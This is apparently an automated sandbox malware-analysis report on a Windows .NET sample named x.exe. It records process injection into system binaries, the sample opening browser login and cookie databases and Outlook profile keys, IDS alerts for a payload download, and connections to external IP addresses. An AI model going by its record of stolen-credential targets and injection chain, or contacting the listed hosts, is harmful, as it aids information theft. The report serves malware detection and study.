            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Section loaded: NULL target: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Section loaded: NULL target: C:\Windows\SysWOW64\rasdial.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\rasdial.exe; Section loaded: NULL target: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe protection: read write
            Source: C:\Windows\SysWOW64\rasdial.exe; Section loaded: NULL target: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\rasdial.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\rasdial.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\rasdial.exe; Thread register set: target process: 5200
            Source: C:\Windows\SysWOW64\rasdial.exe; Thread APC queued: target process: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
            Source: C:\Users\user\Desktop\x.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
            Source: C:\Users\user\Desktop\x.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000
            Source: C:\Users\user\Desktop\x.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 1130008
            Source: C:\Users\user\Desktop\x.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            Source: C:\Users\user\Desktop\x.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; Process created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"
            Source: C:\Windows\SysWOW64\rasdial.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: crUcuBAsmdG.exe, 00000005.00000002.3318030897.0000000001810000.00000002.00000001.00040000.00000000.sdmp, crUcuBAsmdG.exe, 00000005.00000000.1811721054.0000000001811000.00000002.00000001.00040000.00000000.sdmp, crUcuBAsmdG.exe, 00000009.00000002.3318179146.0000000001630000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
            Source: crUcuBAsmdG.exe, 00000005.00000002.3318030897.0000000001810000.00000002.00000001.00040000.00000000.sdmp, crUcuBAsmdG.exe, 00000005.00000000.1811721054.0000000001811000.00000002.00000001.00040000.00000000.sdmp, crUcuBAsmdG.exe, 00000009.00000002.3318179146.0000000001630000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
            Source: crUcuBAsmdG.exe, 00000005.00000002.3318030897.0000000001810000.00000002.00000001.00040000.00000000.sdmp, crUcuBAsmdG.exe, 00000005.00000000.1811721054.0000000001811000.00000002.00000001.00040000.00000000.sdmp, crUcuBAsmdG.exe, 00000009.00000002.3318179146.0000000001630000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: 0Program Manager
            Source: crUcuBAsmdG.exe, 00000005.00000002.3318030897.0000000001810000.00000002.00000001.00040000.00000000.sdmp, crUcuBAsmdG.exe, 00000005.00000000.1811721054.0000000001811000.00000002.00000001.00040000.00000000.sdmp, crUcuBAsmdG.exe, 00000009.00000002.3318179146.0000000001630000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\x.exe; Queries volume information: C:\Users\user\Desktop\x.exe VolumeInformation
            Source: C:\Users\user\Desktop\x.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match; File source: 3.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 3.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000006.00000002.3318244175.0000000004890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000006.00000002.3318289936.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.1889593144.0000000001920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000009.00000002.3320183434.00000000053F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.1890039975.00000000045D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\rasdial.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\rasdial.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\rasdial.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\rasdial.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\rasdial.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\rasdial.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\rasdial.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\rasdial.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\rasdial.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match; File source: 3.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 3.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000006.00000002.3318244175.0000000004890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000006.00000002.3318289936.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.1889593144.0000000001920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000009.00000002.3320183434.00000000053F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.1890039975.00000000045D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 612 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 11 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 612 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 3 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            [Behavior graph. Behavior Graph ID: 1509400; Sample: x.exe; Startdate: 11/09/2024; Architecture: WINDOWS; Score: 100. Process chain: x.exe started two aspnet_compiler.exe processes; crUcuBAsmdG.exe was injected from aspnet_compiler.exe and started rasdial.exe; rasdial.exe injected crUcuBAsmdG.exe and started firefox.exe.]

            Source | Detection | Scanner | Label | Link
            x.exe | 21% | ReversingLabs | |
            x.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            Joe Sandbox version: 40.0.0 Tourmaline
            Analysis ID: 1509400
            Start date and time: 2024-09-11 15:42:03 +02:00
            Joe Sandbox product: CloudBasic
            Overall analysis duration: 0h 9m 27s
            Hypervisor based Inspection enabled: false
            Report type: full
            Cookbook file name: default.jbs
            Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Run name: Run with higher sleep bypass
            Number of analysed new started processes analysed: 10
            Number of new started drivers analysed: 0
            Number of existing processes analysed: 0
            Number of existing drivers analysed: 0
            Number of injected processes analysed: 2
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode: default
            Analysis stop reason: Timeout
            Sample name: x.exe
            Detection: MAL
            Classification: mal100.troj.spyw.evad.winEXE@9/2@11/8
            EGA Information:
            • Successful, ratio: 75%
            HCA Information:
            • Successful, ratio: 95%
            • Number of executed functions: 95
            • Number of non-executed functions: 300
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Execution Graph export aborted for target crUcuBAsmdG.exe, PID 5380 because it is empty
            • Not all processes were analyzed, report is missing behavior information
            • Report creation exceeded maximum time and may have missing disassembly code information.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtReadVirtualMemory calls found.
            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • VT rate limit hit for: x.exe
            Time | Type | Description
            09:44:22 | API Interceptor | 6512485x Sleep call for process: rasdial.exe modified
                                                    No context
                                                    Process:C:\Users\user\Desktop\x.exe
                                                    File Type:CSV text
                                                    Category:dropped
                                                    Size (bytes):847
                                                    Entropy (8bit):5.345615485833535
                                                    Encrypted:false
                                                    SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                                    MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                                    SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                                    SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                                    SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                                    Malicious:true
                                                    Reputation:moderate, very likely benign file
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                                                    Process:C:\Windows\SysWOW64\rasdial.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                    Category:dropped
                                                    Size (bytes):196608
                                                    Entropy (8bit):1.1209886597424439
                                                    Encrypted:false
                                                    SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                    MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                    SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                    SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                    SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W...
                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):6.082167710127673
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    • DOS Executable Generic (2002/1) 0.01%
                                                    File name:x.exe
                                                    File size:24'576 bytes
                                                    MD5:ba5ee405d2cc8ef536634c4e8e4bf0cb
                                                    SHA1:c91ab3aba77a079926a28cabe247b5e6db3e59fe
                                                    SHA256:69d7e14e2d5fc77e347add9b897623a3615e1c9c483f9ef408b59ec44024fe94
                                                    SHA512:260ae119f4b59d5aeb583600e24a7eb1228b6389454cab9a3eff91b1a9543494d206be0ded4144e541d60b354d4fc1a6f9ac52caa317eba794320245c7e59a88
                                                    SSDEEP:384:LH09Fh+MaeWZJF5OB41GfefiyajWxbth2O6YGe1A3HTJruelJskELNFd:shyeW7OBqiHO363zJruCX8/
                                                    TLSH:BDB25C8677ED972BC3ACA7BE89B611880734C3657A53C3CAAEA0514E1D837DD7101F16
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0..V...\......Jt... ........@.. ....................................`................................
                                                    Icon Hash:00928e8e8686b000
                                                    Entrypoint:0x40744a
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x66E0FD8C [Wed Sep 11 02:16:44 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73f0 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa000 | 0x5b8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x8000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x4200 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x5450 | 0x5600 | 993e078b43ef2f70e6fea0e60816367d | False | 0.6016533430232558 | data | 6.300812789403103 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.reloc | 0x8000 | 0xc | 0x200 | b75c6cf1ba24f4c92d1fc7bab8379760 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0xa000 | 0x5b8 | 0x600 | 80f310006036e90ab670131ccb65bb67 | False | 0.4225260416666667 | data | 4.149945226374254 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xa0a0 | 0x32c | data | | | 0.42610837438423643
RT_MANIFEST | 0xa3cc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-11T15:43:06.003455+0200 | 2019696 | ET MALWARE Possible MalDoc Payload Download Nov 11 2014 | 1 | 192.168.2.8 | 49706 | 89.42.218.72 | 443 | TCP
2024-09-11T15:43:06.003455+0200 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.8 | 49706 | 89.42.218.72 | 443 | TCP
2024-09-11T15:43:07.565181+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49707 | 89.42.218.72 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                    Sep 11, 2024 15:44:46.119437933 CEST8049726154.23.184.60192.168.2.8
                                                    Sep 11, 2024 15:44:47.025702000 CEST8049726154.23.184.60192.168.2.8
                                                    Sep 11, 2024 15:44:47.027074099 CEST8049726154.23.184.60192.168.2.8
                                                    Sep 11, 2024 15:44:47.027142048 CEST4972680192.168.2.8154.23.184.60
                                                    Sep 11, 2024 15:44:47.628501892 CEST4972680192.168.2.8154.23.184.60
                                                    Sep 11, 2024 15:44:48.646624088 CEST4972780192.168.2.8154.23.184.60
                                                    Sep 11, 2024 15:44:48.651838064 CEST8049727154.23.184.60192.168.2.8
                                                    Sep 11, 2024 15:44:48.651963949 CEST4972780192.168.2.8154.23.184.60
                                                    Sep 11, 2024 15:44:48.660743952 CEST4972780192.168.2.8154.23.184.60
                                                    Sep 11, 2024 15:44:48.665807009 CEST8049727154.23.184.60192.168.2.8
                                                    Sep 11, 2024 15:44:48.665920019 CEST8049727154.23.184.60192.168.2.8
                                                    Sep 11, 2024 15:44:49.785161972 CEST8049727154.23.184.60192.168.2.8
                                                    Sep 11, 2024 15:44:49.785222054 CEST8049727154.23.184.60192.168.2.8
                                                    Sep 11, 2024 15:44:49.785288095 CEST4972780192.168.2.8154.23.184.60
                                                    Sep 11, 2024 15:44:50.175302982 CEST4972780192.168.2.8154.23.184.60
                                                    Sep 11, 2024 15:44:51.193478107 CEST4972880192.168.2.8154.23.184.60
                                                    Sep 11, 2024 15:44:51.198832035 CEST8049728154.23.184.60192.168.2.8
                                                    Sep 11, 2024 15:44:51.199235916 CEST4972880192.168.2.8154.23.184.60
                                                    Sep 11, 2024 15:44:51.204773903 CEST4972880192.168.2.8154.23.184.60
                                                    Sep 11, 2024 15:44:51.209770918 CEST8049728154.23.184.60192.168.2.8
                                                    Sep 11, 2024 15:44:52.152250051 CEST8049728154.23.184.60192.168.2.8
                                                    Sep 11, 2024 15:44:52.152308941 CEST8049728154.23.184.60192.168.2.8
                                                    Sep 11, 2024 15:44:52.152518034 CEST4972880192.168.2.8154.23.184.60
                                                    Sep 11, 2024 15:44:52.154649019 CEST4972880192.168.2.8154.23.184.60
                                                    Sep 11, 2024 15:44:52.159775972 CEST8049728154.23.184.60192.168.2.8
                                                    Sep 11, 2024 15:44:57.217255116 CEST4972980192.168.2.8162.0.238.43
                                                    Sep 11, 2024 15:44:57.222734928 CEST8049729162.0.238.43192.168.2.8
                                                    Sep 11, 2024 15:44:57.222852945 CEST4972980192.168.2.8162.0.238.43
                                                    Sep 11, 2024 15:44:57.231609106 CEST4972980192.168.2.8162.0.238.43
                                                    Sep 11, 2024 15:44:57.236421108 CEST8049729162.0.238.43192.168.2.8
                                                    Sep 11, 2024 15:44:57.824476957 CEST8049729162.0.238.43192.168.2.8
                                                    Sep 11, 2024 15:44:57.825162888 CEST8049729162.0.238.43192.168.2.8
                                                    Sep 11, 2024 15:44:57.825237989 CEST4972980192.168.2.8162.0.238.43
                                                    Sep 11, 2024 15:44:58.741283894 CEST4972980192.168.2.8162.0.238.43
                                                    Sep 11, 2024 15:44:59.757826090 CEST4973080192.168.2.8162.0.238.43
                                                    Sep 11, 2024 15:44:59.764293909 CEST8049730162.0.238.43192.168.2.8
                                                    Sep 11, 2024 15:44:59.764377117 CEST4973080192.168.2.8162.0.238.43
                                                    Sep 11, 2024 15:44:59.775018930 CEST4973080192.168.2.8162.0.238.43
                                                    Sep 11, 2024 15:44:59.780044079 CEST8049730162.0.238.43192.168.2.8
                                                    Sep 11, 2024 15:45:00.400854111 CEST8049730162.0.238.43192.168.2.8
                                                    Sep 11, 2024 15:45:00.400933027 CEST8049730162.0.238.43192.168.2.8
                                                    Sep 11, 2024 15:45:00.400988102 CEST4973080192.168.2.8162.0.238.43
                                                    Sep 11, 2024 15:45:01.284701109 CEST4973080192.168.2.8162.0.238.43
                                                    Sep 11, 2024 15:45:02.303745985 CEST4973180192.168.2.8162.0.238.43
                                                    Sep 11, 2024 15:45:02.308743954 CEST8049731162.0.238.43192.168.2.8
                                                    Sep 11, 2024 15:45:02.308818102 CEST4973180192.168.2.8162.0.238.43
                                                    Sep 11, 2024 15:45:02.320782900 CEST4973180192.168.2.8162.0.238.43
                                                    Sep 11, 2024 15:45:02.325798035 CEST8049731162.0.238.43192.168.2.8
                                                    Sep 11, 2024 15:45:02.325831890 CEST8049731162.0.238.43192.168.2.8
                                                    Sep 11, 2024 15:45:02.993464947 CEST8049731162.0.238.43192.168.2.8
                                                    Sep 11, 2024 15:45:02.993484974 CEST8049731162.0.238.43192.168.2.8
                                                    Sep 11, 2024 15:45:02.997343063 CEST4973180192.168.2.8162.0.238.43
                                                    Sep 11, 2024 15:45:03.831573963 CEST4973180192.168.2.8162.0.238.43
                                                    Sep 11, 2024 15:45:04.853347063 CEST4973280192.168.2.8162.0.238.43
                                                    Sep 11, 2024 15:45:04.870444059 CEST8049732162.0.238.43192.168.2.8
                                                    Sep 11, 2024 15:45:04.873374939 CEST4973280192.168.2.8162.0.238.43
                                                    Sep 11, 2024 15:45:04.881326914 CEST4973280192.168.2.8162.0.238.43
                                                    Sep 11, 2024 15:45:04.887999058 CEST8049732162.0.238.43192.168.2.8
                                                    Sep 11, 2024 15:45:05.507752895 CEST8049732162.0.238.43192.168.2.8
                                                    Sep 11, 2024 15:45:05.507806063 CEST8049732162.0.238.43192.168.2.8
                                                    Sep 11, 2024 15:45:05.507905006 CEST4973280192.168.2.8162.0.238.43
                                                    Sep 11, 2024 15:45:05.511399031 CEST4973280192.168.2.8162.0.238.43
                                                    Sep 11, 2024 15:45:05.516463041 CEST8049732162.0.238.43192.168.2.8
                                                    Sep 11, 2024 15:45:10.855479956 CEST4973380192.168.2.8136.143.186.12
                                                    Sep 11, 2024 15:45:10.860447884 CEST8049733136.143.186.12192.168.2.8
                                                    Sep 11, 2024 15:45:10.863531113 CEST4973380192.168.2.8136.143.186.12
                                                    Sep 11, 2024 15:45:10.875428915 CEST4973380192.168.2.8136.143.186.12
                                                    Sep 11, 2024 15:45:10.880539894 CEST8049733136.143.186.12192.168.2.8
                                                    Sep 11, 2024 15:45:11.474853039 CEST8049733136.143.186.12192.168.2.8
                                                    Sep 11, 2024 15:45:11.474931955 CEST8049733136.143.186.12192.168.2.8
                                                    Sep 11, 2024 15:45:11.474968910 CEST4973380192.168.2.8136.143.186.12
                                                    Sep 11, 2024 15:45:11.475306034 CEST8049733136.143.186.12192.168.2.8
                                                    Sep 11, 2024 15:45:11.475359917 CEST4973380192.168.2.8136.143.186.12
                                                    Sep 11, 2024 15:45:12.378580093 CEST4973380192.168.2.8136.143.186.12
                                                    Sep 11, 2024 15:45:13.399410963 CEST4973480192.168.2.8136.143.186.12
                                                    Sep 11, 2024 15:45:13.404517889 CEST8049734136.143.186.12192.168.2.8
                                                    Sep 11, 2024 15:45:13.411420107 CEST4973480192.168.2.8136.143.186.12
                                                    Sep 11, 2024 15:45:13.419418097 CEST4973480192.168.2.8136.143.186.12
                                                    Sep 11, 2024 15:45:13.424808979 CEST8049734136.143.186.12192.168.2.8
                                                    Sep 11, 2024 15:45:14.022538900 CEST8049734136.143.186.12192.168.2.8
                                                    Sep 11, 2024 15:45:14.022592068 CEST8049734136.143.186.12192.168.2.8
                                                    Sep 11, 2024 15:45:14.022631884 CEST4973480192.168.2.8136.143.186.12
                                                    Sep 11, 2024 15:45:14.022785902 CEST8049734136.143.186.12192.168.2.8
                                                    Sep 11, 2024 15:45:14.022825003 CEST4973480192.168.2.8136.143.186.12
                                                    Sep 11, 2024 15:45:14.925383091 CEST4973480192.168.2.8136.143.186.12
                                                    Sep 11, 2024 15:45:15.944410086 CEST4973580192.168.2.8136.143.186.12
                                                    Sep 11, 2024 15:45:15.949508905 CEST8049735136.143.186.12192.168.2.8
                                                    Sep 11, 2024 15:45:15.949628115 CEST4973580192.168.2.8136.143.186.12
